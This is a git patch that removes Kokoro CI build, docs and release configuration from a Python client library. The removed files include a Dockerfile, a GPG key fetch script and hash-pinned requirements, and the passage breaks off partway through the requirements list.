(#2141) --- .github/.OwlBot.lock.yaml | 4 +- .kokoro/docker/docs/Dockerfile | 89 ----- .kokoro/docker/docs/fetch_gpg_keys.sh | 45 --- .kokoro/docker/docs/requirements.in | 2 - .kokoro/docker/docs/requirements.txt | 297 --------------- .kokoro/docs/common.cfg | 66 ---- .kokoro/docs/docs-presubmit.cfg | 28 -- .kokoro/docs/docs.cfg | 1 - .kokoro/publish-docs.sh | 58 --- .kokoro/release.sh | 29 -- .kokoro/release/common.cfg | 43 --- .kokoro/release/release.cfg | 1 - .kokoro/requirements.in | 11 - .kokoro/requirements.txt | 513 -------------------------- 14 files changed, 2 insertions(+), 1185 deletions(-) delete mode 100644 .kokoro/docker/docs/Dockerfile delete mode 100755 .kokoro/docker/docs/fetch_gpg_keys.sh delete mode 100644 .kokoro/docker/docs/requirements.in delete mode 100644 .kokoro/docker/docs/requirements.txt delete mode 100644 .kokoro/docs/common.cfg delete mode 100644 .kokoro/docs/docs-presubmit.cfg delete mode 100644 .kokoro/docs/docs.cfg delete mode 100755 .kokoro/publish-docs.sh delete mode 100755 .kokoro/release.sh delete mode 100644 .kokoro/release/common.cfg delete mode 100644 .kokoro/release/release.cfg delete mode 100644 .kokoro/requirements.in delete mode 100644 .kokoro/requirements.txt diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 3f7634f25..9d743afe8 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:f016446d6e520e5fb552c45b110cba3f217bffdd3d06bdddd076e9e6d13266cf -# created: 2025-02-21T19:32:52.01306189Z + digest: sha256:5581906b957284864632cde4e9c51d1cc66b0094990b27e689132fe5cd036046 +# created: 2025-03-07 diff --git a/.kokoro/docker/docs/Dockerfile b/.kokoro/docker/docs/Dockerfile deleted file mode 100644 index e5410e296..000000000 --- a/.kokoro/docker/docs/Dockerfile +++ /dev/null @@ -1,89 +0,0 @@ -# Copyright 2024 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -from ubuntu:24.04 - -ENV DEBIAN_FRONTEND noninteractive - -# Ensure local Python is preferred over distribution Python. -ENV PATH /usr/local/bin:$PATH - -# Install dependencies. -RUN apt-get update \ - && apt-get install -y --no-install-recommends \ - apt-transport-https \ - build-essential \ - ca-certificates \ - curl \ - dirmngr \ - git \ - gpg-agent \ - graphviz \ - libbz2-dev \ - libdb5.3-dev \ - libexpat1-dev \ - libffi-dev \ - liblzma-dev \ - libreadline-dev \ - libsnappy-dev \ - libssl-dev \ - libsqlite3-dev \ - portaudio19-dev \ - redis-server \ - software-properties-common \ - ssh \ - sudo \ - tcl \ - tcl-dev \ - tk \ - tk-dev \ - uuid-dev \ - wget \ - zlib1g-dev \ - && add-apt-repository universe \ - && apt-get update \ - && apt-get -y install jq \ - && apt-get clean autoclean \ - && apt-get autoremove -y \ - && rm -rf /var/lib/apt/lists/* \ - && rm -f /var/cache/apt/archives/*.deb - - -###################### Install python 3.10.14 for docs/docfx session - -# Download python 3.10.14 -RUN wget https://www.python.org/ftp/python/3.10.14/Python-3.10.14.tgz - -# Extract files -RUN tar -xvf Python-3.10.14.tgz - -# Install python 3.10.14 -RUN ./Python-3.10.14/configure --enable-optimizations -RUN make altinstall - -ENV PATH /usr/local/bin/python3.10:$PATH - -###################### Install pip -RUN wget -O /tmp/get-pip.py 'https://bootstrap.pypa.io/get-pip.py' \ - && python3.10 /tmp/get-pip.py \ - && rm /tmp/get-pip.py - -# Test pip -RUN python3.10 -m pip - -# Install build requirements -COPY requirements.txt /requirements.txt -RUN python3.10 -m pip install --require-hashes -r requirements.txt - -CMD ["python3.10"] diff --git a/.kokoro/docker/docs/fetch_gpg_keys.sh b/.kokoro/docker/docs/fetch_gpg_keys.sh deleted file mode 100755 index d653dd868..000000000 --- a/.kokoro/docker/docs/fetch_gpg_keys.sh +++ /dev/null @@ -1,45 +0,0 @@ -#!/bin/bash -# Copyright 2020 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -# A script to fetch gpg keys with retry. -# Avoid jinja parsing the file. -# - -function retry { - if [[ "${#}" -le 1 ]]; then - echo "Usage: ${0} retry_count commands.." - exit 1 - fi - local retries=${1} - local command="${@:2}" - until [[ "${retries}" -le 0 ]]; do - $command && return 0 - if [[ $? -ne 0 ]]; then - echo "command failed, retrying" - ((retries--)) - fi - done - return 1 -} - -# 3.6.9, 3.7.5 (Ned Deily) -retry 3 gpg --keyserver ha.pool.sks-keyservers.net --recv-keys \ - 0D96DF4D4110E5C43FBFB17F2D347EA6AA65421D - -# 3.8.0 (Łukasz Langa) -retry 3 gpg --keyserver ha.pool.sks-keyservers.net --recv-keys \ - E3FF2839C048B25C084DEBE9B26995E310250568 - -# diff --git a/.kokoro/docker/docs/requirements.in b/.kokoro/docker/docs/requirements.in deleted file mode 100644 index 586bd0703..000000000 --- a/.kokoro/docker/docs/requirements.in +++ /dev/null @@ -1,2 +0,0 @@ -nox -gcp-docuploader diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt deleted file mode 100644 index a9360a25b..000000000 --- a/.kokoro/docker/docs/requirements.txt +++ /dev/null @@ -1,297 +0,0 @@ -# -# This file is autogenerated by pip-compile with Python 3.10 -# by the following command: -# -# pip-compile --allow-unsafe --generate-hashes requirements.in -# -argcomplete==3.5.3 \ - --hash=sha256:2ab2c4a215c59fd6caaff41a869480a23e8f6a5f910b266c1808037f4e375b61 \ - --hash=sha256:c12bf50eded8aebb298c7b7da7a5ff3ee24dffd9f5281867dfe1424b58c55392 - # via nox -cachetools==5.5.0 \ - --hash=sha256:02134e8439cdc2ffb62023ce1debca2944c3f289d66bb17ead3ab3dede74b292 \ - --hash=sha256:2cc24fb4cbe39633fb7badd9db9ca6295d766d9c2995f245725a46715d050f2a - # via google-auth -certifi==2024.12.14 \ - --hash=sha256:1275f7a45be9464efc1173084eaa30f866fe2e47d389406136d332ed4967ec56 \ - --hash=sha256:b650d30f370c2b724812bee08008be0c4163b163ddaec3f2546c1caf65f191db - # via requests -charset-normalizer==3.4.1 \ - --hash=sha256:0167ddc8ab6508fe81860a57dd472b2ef4060e8d378f0cc555707126830f2537 \ - --hash=sha256:01732659ba9b5b873fc117534143e4feefecf3b2078b0a6a2e925271bb6f4cfa \ - --hash=sha256:01ad647cdd609225c5350561d084b42ddf732f4eeefe6e678765636791e78b9a \ - --hash=sha256:04432ad9479fa40ec0f387795ddad4437a2b50417c69fa275e212933519ff294 \ - --hash=sha256:0907f11d019260cdc3f94fbdb23ff9125f6b5d1039b76003b5b0ac9d6a6c9d5b \ - --hash=sha256:0924e81d3d5e70f8126529951dac65c1010cdf117bb75eb02dd12339b57749dd \ - --hash=sha256:09b26ae6b1abf0d27570633b2b078a2a20419c99d66fb2823173d73f188ce601 \ - --hash=sha256:09b5e6733cbd160dcc09589227187e242a30a49ca5cefa5a7edd3f9d19ed53fd \ - --hash=sha256:0af291f4fe114be0280cdd29d533696a77b5b49cfde5467176ecab32353395c4 \ - --hash=sha256:0f55e69f030f7163dffe9fd0752b32f070566451afe180f99dbeeb81f511ad8d \ - --hash=sha256:1a2bc9f351a75ef49d664206d51f8e5ede9da246602dc2d2726837620ea034b2 \ - --hash=sha256:22e14b5d70560b8dd51ec22863f370d1e595ac3d024cb8ad7d308b4cd95f8313 \ - --hash=sha256:234ac59ea147c59ee4da87a0c0f098e9c8d169f4dc2a159ef720f1a61bbe27cd \ - --hash=sha256:2369eea1ee4a7610a860d88f268eb39b95cb588acd7235e02fd5a5601773d4fa \ - --hash=sha256:237bdbe6159cff53b4f24f397d43c6336c6b0b42affbe857970cefbb620911c8 \ - --hash=sha256:28bf57629c75e810b6ae989f03c0828d64d6b26a5e205535585f96093e405ed1 \ - --hash=sha256:2967f74ad52c3b98de4c3b32e1a44e32975e008a9cd2a8cc8966d6a5218c5cb2 \ - --hash=sha256:2a75d49014d118e4198bcee5ee0a6f25856b29b12dbf7cd012791f8a6cc5c496 \ - --hash=sha256:2bdfe3ac2e1bbe5b59a1a63721eb3b95fc9b6817ae4a46debbb4e11f6232428d \ - --hash=sha256:2d074908e1aecee37a7635990b2c6d504cd4766c7bc9fc86d63f9c09af3fa11b \ - --hash=sha256:2fb9bd477fdea8684f78791a6de97a953c51831ee2981f8e4f583ff3b9d9687e \ - --hash=sha256:311f30128d7d333eebd7896965bfcfbd0065f1716ec92bd5638d7748eb6f936a \ - --hash=sha256:329ce159e82018d646c7ac45b01a430369d526569ec08516081727a20e9e4af4 \ - --hash=sha256:345b0426edd4e18138d6528aed636de7a9ed169b4aaf9d61a8c19e39d26838ca \ - --hash=sha256:363e2f92b0f0174b2f8238240a1a30142e3db7b957a5dd5689b0e75fb717cc78 \ - --hash=sha256:3a3bd0dcd373514dcec91c411ddb9632c0d7d92aed7093b8c3bbb6d69ca74408 \ - --hash=sha256:3bed14e9c89dcb10e8f3a29f9ccac4955aebe93c71ae803af79265c9ca5644c5 \ - --hash=sha256:44251f18cd68a75b56585dd00dae26183e102cd5e0f9f1466e6df5da2ed64ea3 \ - --hash=sha256:44ecbf16649486d4aebafeaa7ec4c9fed8b88101f4dd612dcaf65d5e815f837f \ - --hash=sha256:4532bff1b8421fd0a320463030c7520f56a79c9024a4e88f01c537316019005a \ - --hash=sha256:49402233c892a461407c512a19435d1ce275543138294f7ef013f0b63d5d3765 \ - --hash=sha256:4c0907b1928a36d5a998d72d64d8eaa7244989f7aaaf947500d3a800c83a3fd6 \ - --hash=sha256:4d86f7aff21ee58f26dcf5ae81a9addbd914115cdebcbb2217e4f0ed8982e146 \ - --hash=sha256:5777ee0881f9499ed0f71cc82cf873d9a0ca8af166dfa0af8ec4e675b7df48e6 \ - --hash=sha256:5df196eb874dae23dcfb968c83d4f8fdccb333330fe1fc278ac5ceeb101003a9 \ - --hash=sha256:619a609aa74ae43d90ed2e89bdd784765de0a25ca761b93e196d938b8fd1dbbd \ - --hash=sha256:6e27f48bcd0957c6d4cb9d6fa6b61d192d0b13d5ef563e5f2ae35feafc0d179c \ - --hash=sha256:6ff8a4a60c227ad87030d76e99cd1698345d4491638dfa6673027c48b3cd395f \ - --hash=sha256:73d94b58ec7fecbc7366247d3b0b10a21681004153238750bb67bd9012414545 \ - --hash=sha256:7461baadb4dc00fd9e0acbe254e3d7d2112e7f92ced2adc96e54ef6501c5f176 \ - --hash=sha256:75832c08354f595c760a804588b9357d34ec00ba1c940c15e31e96d902093770 \ - --hash=sha256:7709f51f5f7c853f0fb938bcd3bc59cdfdc5203635ffd18bf354f6967ea0f824 \ - --hash=sha256:78baa6d91634dfb69ec52a463534bc0df05dbd546209b79a3880a34487f4b84f \ - --hash=sha256:7974a0b5ecd505609e3b19742b60cee7aa2aa2fb3151bc917e6e2646d7667dcf \ - --hash=sha256:7a4f97a081603d2050bfaffdefa5b02a9ec823f8348a572e39032caa8404a487 \ - --hash=sha256:7b1bef6280950ee6c177b326508f86cad7ad4dff12454483b51d8b7d673a2c5d \ - --hash=sha256:7d053096f67cd1241601111b698f5cad775f97ab25d81567d3f59219b5f1adbd \ - --hash=sha256:804a4d582ba6e5b747c625bf1255e6b1507465494a40a2130978bda7b932c90b \ - --hash=sha256:807f52c1f798eef6cf26beb819eeb8819b1622ddfeef9d0977a8502d4db6d534 \ - --hash=sha256:80ed5e856eb7f30115aaf94e4a08114ccc8813e6ed1b5efa74f9f82e8509858f \ - --hash=sha256:8417cb1f36cc0bc7eaba8ccb0e04d55f0ee52df06df3ad55259b9a323555fc8b \ - --hash=sha256:8436c508b408b82d87dc5f62496973a1805cd46727c34440b0d29d8a2f50a6c9 \ - --hash=sha256:89149166622f4db9b4b6a449256291dc87a99ee53151c74cbd82a53c8c2f6ccd \ - --hash=sha256:8bfa33f4f2672964266e940dd22a195989ba31669bd84629f05fab3ef4e2d125 \ - --hash=sha256:8c60ca7339acd497a55b0ea5d506b2a2612afb2826560416f6894e8b5770d4a9 \ - --hash=sha256:91b36a978b5ae0ee86c394f5a54d6ef44db1de0815eb43de826d41d21e4af3de \ - --hash=sha256:955f8851919303c92343d2f66165294848d57e9bba6cf6e3625485a70a038d11 \ - --hash=sha256:97f68b8d6831127e4787ad15e6757232e14e12060bec17091b85eb1486b91d8d \ - --hash=sha256:9b23ca7ef998bc739bf6ffc077c2116917eabcc901f88da1b9856b210ef63f35 \ - --hash=sha256:9f0b8b1c6d84c8034a44893aba5e767bf9c7a211e313a9605d9c617d7083829f \ - --hash=sha256:aabfa34badd18f1da5ec1bc2715cadc8dca465868a4e73a0173466b688f29dda \ - --hash=sha256:ab36c8eb7e454e34e60eb55ca5d241a5d18b2c6244f6827a30e451c42410b5f7 \ - --hash=sha256:b010a7a4fd316c3c484d482922d13044979e78d1861f0e0650423144c616a46a \ - --hash=sha256:b1ac5992a838106edb89654e0aebfc24f5848ae2547d22c2c3f66454daa11971 \ - --hash=sha256:b7b2d86dd06bfc2ade3312a83a5c364c7ec2e3498f8734282c6c3d4b07b346b8 \ - --hash=sha256:b97e690a2118911e39b4042088092771b4ae3fc3aa86518f84b8cf6888dbdb41 \ - --hash=sha256:bc2722592d8998c870fa4e290c2eec2c1569b87fe58618e67d38b4665dfa680d \ - --hash=sha256:c0429126cf75e16c4f0ad00ee0eae4242dc652290f940152ca8c75c3a4b6ee8f \ - --hash=sha256:c30197aa96e8eed02200a83fba2657b4c3acd0f0aa4bdc9f6c1af8e8962e0757 \ - --hash=sha256:c4c3e6da02df6fa1410a7680bd3f63d4f710232d3139089536310d027950696a \ - --hash=sha256:c75cb2a3e389853835e84a2d8fb2b81a10645b503eca9bcb98df6b5a43eb8886 \ - --hash=sha256:c96836c97b1238e9c9e3fe90844c947d5afbf4f4c92762679acfe19927d81d77 \ - --hash=sha256:d7f50a1f8c450f3925cb367d011448c39239bb3eb4117c36a6d354794de4ce76 \ - --hash=sha256:d973f03c0cb71c5ed99037b870f2be986c3c05e63622c017ea9816881d2dd247 \ - --hash=sha256:d98b1668f06378c6dbefec3b92299716b931cd4e6061f3c875a71ced1780ab85 \ - --hash=sha256:d9c3cdf5390dcd29aa8056d13e8e99526cda0305acc038b96b30352aff5ff2bb \ - --hash=sha256:dad3e487649f498dd991eeb901125411559b22e8d7ab25d3aeb1af367df5efd7 \ - --hash=sha256:dccbe65bd2f7f7ec22c4ff99ed56faa1e9f785482b9bbd7c717e26fd723a1d1e \ - --hash=sha256:dd78cfcda14a1ef52584dbb008f7ac81c1328c0f58184bf9a84c49c605002da6 \ - --hash=sha256:e218488cd232553829be0664c2292d3af2eeeb94b32bea483cf79ac6a694e037 \ - --hash=sha256:e358e64305fe12299a08e08978f51fc21fac060dcfcddd95453eabe5b93ed0e1 \ - --hash=sha256:ea0d8d539afa5eb2728aa1932a988a9a7af94f18582ffae4bc10b3fbdad0626e \ - --hash=sha256:eab677309cdb30d047996b36d34caeda1dc91149e4fdca0b1a039b3f79d9a807 \ - --hash=sha256:eb8178fe3dba6450a3e024e95ac49ed3400e506fd4e9e5c32d30adda88cbd407 \ - --hash=sha256:ecddf25bee22fe4fe3737a399d0d177d72bc22be6913acfab364b40bce1ba83c \ - --hash=sha256:eea6ee1db730b3483adf394ea72f808b6e18cf3cb6454b4d86e04fa8c4327a12 \ - --hash=sha256:f08ff5e948271dc7e18a35641d2f11a4cd8dfd5634f55228b691e62b37125eb3 \ - --hash=sha256:f30bf9fd9be89ecb2360c7d94a711f00c09b976258846efe40db3d05828e8089 \ - --hash=sha256:fa88b843d6e211393a37219e6a1c1df99d35e8fd90446f1118f4216e307e48cd \ - --hash=sha256:fc54db6c8593ef7d4b2a331b58653356cf04f67c960f584edb7c3d8c97e8f39e \ - --hash=sha256:fd4ec41f914fa74ad1b8304bbc634b3de73d2a0889bd32076342a573e0779e00 \ - --hash=sha256:ffc9202a29ab3920fa812879e95a9e78b2465fd10be7fcbd042899695d75e616 - # via requests -click==8.1.8 \ - --hash=sha256:63c132bbbed01578a06712a2d1f497bb62d9c1c0d329b7903a866228027263b2 \ - --hash=sha256:ed53c9d8990d83c2a27deae68e4ee337473f6330c040a31d4225c9574d16096a - # via gcp-docuploader -colorlog==6.9.0 \ - --hash=sha256:5906e71acd67cb07a71e779c47c4bcb45fb8c2993eebe9e5adcd6a6f1b283eff \ - --hash=sha256:bfba54a1b93b94f54e1f4fe48395725a3d92fd2a4af702f6bd70946bdc0c6ac2 - # via - # gcp-docuploader - # nox -distlib==0.3.9 \ - --hash=sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87 \ - --hash=sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403 - # via virtualenv -filelock==3.16.1 \ - --hash=sha256:2082e5703d51fbf98ea75855d9d5527e33d8ff23099bec374a134febee6946b0 \ - --hash=sha256:c249fbfcd5db47e5e2d6d62198e565475ee65e4831e2561c8e313fa7eb961435 - # via virtualenv -gcp-docuploader==0.6.5 \ - --hash=sha256:30221d4ac3e5a2b9c69aa52fdbef68cc3f27d0e6d0d90e220fc024584b8d2318 \ - --hash=sha256:b7458ef93f605b9d46a4bf3a8dc1755dad1f31d030c8679edf304e343b347eea - # via -r requirements.in -google-api-core==2.24.0 \ - --hash=sha256:10d82ac0fca69c82a25b3efdeefccf6f28e02ebb97925a8cce8edbfe379929d9 \ - --hash=sha256:e255640547a597a4da010876d333208ddac417d60add22b6851a0c66a831fcaf - # via - # google-cloud-core - # google-cloud-storage -google-auth==2.37.0 \ - --hash=sha256:0054623abf1f9c83492c63d3f47e77f0a544caa3d40b2d98e099a611c2dd5d00 \ - --hash=sha256:42664f18290a6be591be5329a96fe30184be1a1badb7292a7f686a9659de9ca0 - # via - # google-api-core - # google-cloud-core - # google-cloud-storage -google-cloud-core==2.4.1 \ - --hash=sha256:9b7749272a812bde58fff28868d0c5e2f585b82f37e09a1f6ed2d4d10f134073 \ - --hash=sha256:a9e6a4422b9ac5c29f79a0ede9485473338e2ce78d91f2370c01e730eab22e61 - # via google-cloud-storage -google-cloud-storage==2.19.0 \ - --hash=sha256:aeb971b5c29cf8ab98445082cbfe7b161a1f48ed275822f59ed3f1524ea54fba \ - --hash=sha256:cd05e9e7191ba6cb68934d8eb76054d9be4562aa89dbc4236feee4d7d51342b2 - # via gcp-docuploader -google-crc32c==1.6.0 \ - --hash=sha256:05e2d8c9a2f853ff116db9706b4a27350587f341eda835f46db3c0a8c8ce2f24 \ - --hash=sha256:18e311c64008f1f1379158158bb3f0c8d72635b9eb4f9545f8cf990c5668e59d \ - --hash=sha256:236c87a46cdf06384f614e9092b82c05f81bd34b80248021f729396a78e55d7e \ - --hash=sha256:35834855408429cecf495cac67ccbab802de269e948e27478b1e47dfb6465e57 \ - --hash=sha256:386122eeaaa76951a8196310432c5b0ef3b53590ef4c317ec7588ec554fec5d2 \ - --hash=sha256:40b05ab32a5067525670880eb5d169529089a26fe35dce8891127aeddc1950e8 \ - --hash=sha256:48abd62ca76a2cbe034542ed1b6aee851b6f28aaca4e6551b5599b6f3ef175cc \ - --hash=sha256:50cf2a96da226dcbff8671233ecf37bf6e95de98b2a2ebadbfdf455e6d05df42 \ - --hash=sha256:51c4f54dd8c6dfeb58d1df5e4f7f97df8abf17a36626a217f169893d1d7f3e9f \ - --hash=sha256:5bcc90b34df28a4b38653c36bb5ada35671ad105c99cfe915fb5bed7ad6924aa \ - --hash=sha256:62f6d4a29fea082ac4a3c9be5e415218255cf11684ac6ef5488eea0c9132689b \ - --hash=sha256:6eceb6ad197656a1ff49ebfbbfa870678c75be4344feb35ac1edf694309413dc \ - --hash=sha256:7aec8e88a3583515f9e0957fe4f5f6d8d4997e36d0f61624e70469771584c760 \ - --hash=sha256:91ca8145b060679ec9176e6de4f89b07363d6805bd4760631ef254905503598d \ - --hash=sha256:a184243544811e4a50d345838a883733461e67578959ac59964e43cca2c791e7 \ - --hash=sha256:a9e4b426c3702f3cd23b933436487eb34e01e00327fac20c9aebb68ccf34117d \ - --hash=sha256:bb0966e1c50d0ef5bc743312cc730b533491d60585a9a08f897274e57c3f70e0 \ - --hash=sha256:bb8b3c75bd157010459b15222c3fd30577042a7060e29d42dabce449c087f2b3 \ - --hash=sha256:bd5e7d2445d1a958c266bfa5d04c39932dc54093fa391736dbfdb0f1929c1fb3 \ - --hash=sha256:c87d98c7c4a69066fd31701c4e10d178a648c2cac3452e62c6b24dc51f9fcc00 \ - --hash=sha256:d2952396dc604544ea7476b33fe87faedc24d666fb0c2d5ac971a2b9576ab871 \ - --hash=sha256:d8797406499f28b5ef791f339594b0b5fdedf54e203b5066675c406ba69d705c \ - --hash=sha256:d9e9913f7bd69e093b81da4535ce27af842e7bf371cde42d1ae9e9bd382dc0e9 \ - --hash=sha256:e2806553238cd076f0a55bddab37a532b53580e699ed8e5606d0de1f856b5205 \ - --hash=sha256:ebab974b1687509e5c973b5c4b8b146683e101e102e17a86bd196ecaa4d099fc \ - --hash=sha256:ed767bf4ba90104c1216b68111613f0d5926fb3780660ea1198fc469af410e9d \ - --hash=sha256:f7a1fc29803712f80879b0806cb83ab24ce62fc8daf0569f2204a0cfd7f68ed4 - # via - # google-cloud-storage - # google-resumable-media -google-resumable-media==2.7.2 \ - --hash=sha256:3ce7551e9fe6d99e9a126101d2536612bb73486721951e9562fee0f90c6ababa \ - --hash=sha256:5280aed4629f2b60b847b0d42f9857fd4935c11af266744df33d8074cae92fe0 - # via google-cloud-storage -googleapis-common-protos==1.66.0 \ - --hash=sha256:c3e7b33d15fdca5374cc0a7346dd92ffa847425cc4ea941d970f13680052ec8c \ - --hash=sha256:d7abcd75fabb2e0ec9f74466401f6c119a0b498e27370e9be4c94cb7e382b8ed - # via google-api-core -idna==3.10 \ - --hash=sha256:12f65c9b470abda6dc35cf8e63cc574b1c52b11df2c86030af0ac09b01b13ea9 \ - --hash=sha256:946d195a0d259cbba61165e88e65941f16e9b36ea6ddb97f00452bae8b1287d3 - # via requests -nox==2024.10.9 \ - --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ - --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 - # via -r requirements.in -packaging==24.2 \ - --hash=sha256:09abb1bccd265c01f4a3aa3f7a7db064b36514d2cba19a2f694fe6150451a759 \ - --hash=sha256:c228a6dc5e932d346bc5739379109d49e8853dd8223571c7c5b55260edc0b97f - # via nox -platformdirs==4.3.6 \ - --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ - --hash=sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb - # via virtualenv -proto-plus==1.25.0 \ - --hash=sha256:c91fc4a65074ade8e458e95ef8bac34d4008daa7cce4a12d6707066fca648961 \ - --hash=sha256:fbb17f57f7bd05a68b7707e745e26528b0b3c34e378db91eef93912c54982d91 - # via google-api-core -protobuf==5.29.3 \ - --hash=sha256:0a18ed4a24198528f2333802eb075e59dea9d679ab7a6c5efb017a59004d849f \ - --hash=sha256:0eb32bfa5219fc8d4111803e9a690658aa2e6366384fd0851064b963b6d1f2a7 \ - --hash=sha256:3ea51771449e1035f26069c4c7fd51fba990d07bc55ba80701c78f886bf9c888 \ - --hash=sha256:5da0f41edaf117bde316404bad1a486cb4ededf8e4a54891296f648e8e076620 \ - --hash=sha256:6ce8cc3389a20693bfde6c6562e03474c40851b44975c9b2bf6df7d8c4f864da \ - --hash=sha256:84a57163a0ccef3f96e4b6a20516cedcf5bb3a95a657131c5c3ac62200d23252 \ - --hash=sha256:a4fa6f80816a9a0678429e84973f2f98cbc218cca434abe8db2ad0bffc98503a \ - --hash=sha256:a8434404bbf139aa9e1300dbf989667a83d42ddda9153d8ab76e0d5dcaca484e \ - --hash=sha256:b89c115d877892a512f79a8114564fb435943b59067615894c3b13cd3e1fa107 \ - --hash=sha256:c027e08a08be10b67c06bf2370b99c811c466398c357e615ca88c91c07f0910f \ - --hash=sha256:daaf63f70f25e8689c072cfad4334ca0ac1d1e05a92fc15c54eb9cf23c3efd84 - # via - # gcp-docuploader - # google-api-core - # googleapis-common-protos - # proto-plus -pyasn1==0.6.1 \ - --hash=sha256:0d632f46f2ba09143da3a8afe9e33fb6f92fa2320ab7e886e2d0f7672af84629 \ - --hash=sha256:6f580d2bdd84365380830acf45550f2511469f673cb4a5ae3857a3170128b034 - # via - # pyasn1-modules - # rsa -pyasn1-modules==0.4.1 \ - --hash=sha256:49bfa96b45a292b711e986f222502c1c9a5e1f4e568fc30e2574a6c7d07838fd \ - --hash=sha256:c28e2dbf9c06ad61c71a075c7e0f9fd0f1b0bb2d2ad4377f240d33ac2ab60a7c - # via google-auth -requests==2.32.3 \ - --hash=sha256:55365417734eb18255590a9ff9eb97e9e1da868d4ccd6402399eaf68af20a760 \ - --hash=sha256:70761cfe03c773ceb22aa2f671b4757976145175cdfca038c02654d061d6dcc6 - # via - # google-api-core - # google-cloud-storage -rsa==4.9 \ - --hash=sha256:90260d9058e514786967344d0ef75fa8727eed8a7d2e43ce9f4bcf1b536174f7 \ - --hash=sha256:e38464a49c6c85d7f1351b0126661487a7e0a14a50f1675ec50eb34d4f20ef21 - # via google-auth -six==1.17.0 \ - --hash=sha256:4721f391ed90541fddacab5acf947aa0d3dc7d27b2e1e8eda2be8970586c3274 \ - --hash=sha256:ff70335d468e7eb6ec65b95b99d3a2836546063f63acc5171de367e834932a81 - # via gcp-docuploader -tomli==2.2.1 \ - --hash=sha256:023aa114dd824ade0100497eb2318602af309e5a55595f76b626d6d9f3b7b0a6 \ - --hash=sha256:02abe224de6ae62c19f090f68da4e27b10af2b93213d36cf44e6e1c5abd19fdd \ - --hash=sha256:286f0ca2ffeeb5b9bd4fcc8d6c330534323ec51b2f52da063b11c502da16f30c \ - --hash=sha256:2d0f2fdd22b02c6d81637a3c95f8cd77f995846af7414c5c4b8d0545afa1bc4b \ - --hash=sha256:33580bccab0338d00994d7f16f4c4ec25b776af3ffaac1ed74e0b3fc95e885a8 \ - --hash=sha256:400e720fe168c0f8521520190686ef8ef033fb19fc493da09779e592861b78c6 \ - --hash=sha256:40741994320b232529c802f8bc86da4e1aa9f413db394617b9a256ae0f9a7f77 \ - --hash=sha256:465af0e0875402f1d226519c9904f37254b3045fc5084697cefb9bdde1ff99ff \ - --hash=sha256:4a8f6e44de52d5e6c657c9fe83b562f5f4256d8ebbfe4ff922c495620a7f6cea \ - --hash=sha256:4e340144ad7ae1533cb897d406382b4b6fede8890a03738ff1683af800d54192 \ - --hash=sha256:678e4fa69e4575eb77d103de3df8a895e1591b48e740211bd1067378c69e8249 \ - --hash=sha256:6972ca9c9cc9f0acaa56a8ca1ff51e7af152a9f87fb64623e31d5c83700080ee \ - --hash=sha256:7fc04e92e1d624a4a63c76474610238576942d6b8950a2d7f908a340494e67e4 \ - --hash=sha256:889f80ef92701b9dbb224e49ec87c645ce5df3fa2cc548664eb8a25e03127a98 \ - --hash=sha256:8d57ca8095a641b8237d5b079147646153d22552f1c637fd3ba7f4b0b29167a8 \ - --hash=sha256:8dd28b3e155b80f4d54beb40a441d366adcfe740969820caf156c019fb5c7ec4 \ - --hash=sha256:9316dc65bed1684c9a98ee68759ceaed29d229e985297003e494aa825ebb0281 \ - --hash=sha256:a198f10c4d1b1375d7687bc25294306e551bf1abfa4eace6650070a5c1ae2744 \ - --hash=sha256:a38aa0308e754b0e3c67e344754dff64999ff9b513e691d0e786265c93583c69 \ - --hash=sha256:a92ef1a44547e894e2a17d24e7557a5e85a9e1d0048b0b5e7541f76c5032cb13 \ - --hash=sha256:ac065718db92ca818f8d6141b5f66369833d4a80a9d74435a268c52bdfa73140 \ - --hash=sha256:b82ebccc8c8a36f2094e969560a1b836758481f3dc360ce9a3277c65f374285e \ - --hash=sha256:c954d2250168d28797dd4e3ac5cf812a406cd5a92674ee4c8f123c889786aa8e \ - --hash=sha256:cb55c73c5f4408779d0cf3eef9f762b9c9f147a77de7b258bef0a5628adc85cc \ - --hash=sha256:cd45e1dc79c835ce60f7404ec8119f2eb06d38b1deba146f07ced3bbc44505ff \ - --hash=sha256:d3f5614314d758649ab2ab3a62d4f2004c825922f9e370b29416484086b264ec \ - --hash=sha256:d920f33822747519673ee656a4b6ac33e382eca9d331c87770faa3eef562aeb2 \ - --hash=sha256:db2b95f9de79181805df90bedc5a5ab4c165e6ec3fe99f970d0e302f384ad222 \ - --hash=sha256:e59e304978767a54663af13c07b3d1af22ddee3bb2fb0618ca1593e4f593a106 \ - --hash=sha256:e85e99945e688e32d5a35c1ff38ed0b3f41f43fad8df0bdf79f72b2ba7bc5272 \ - --hash=sha256:ece47d672db52ac607a3d9599a9d48dcb2f2f735c6c2d1f34130085bb12b112a \ - --hash=sha256:f4039b9cbc3048b2416cc57ab3bda989a6fcf9b36cf8937f01a6e731b64f80d7 - # via nox -urllib3==2.3.0 \ - 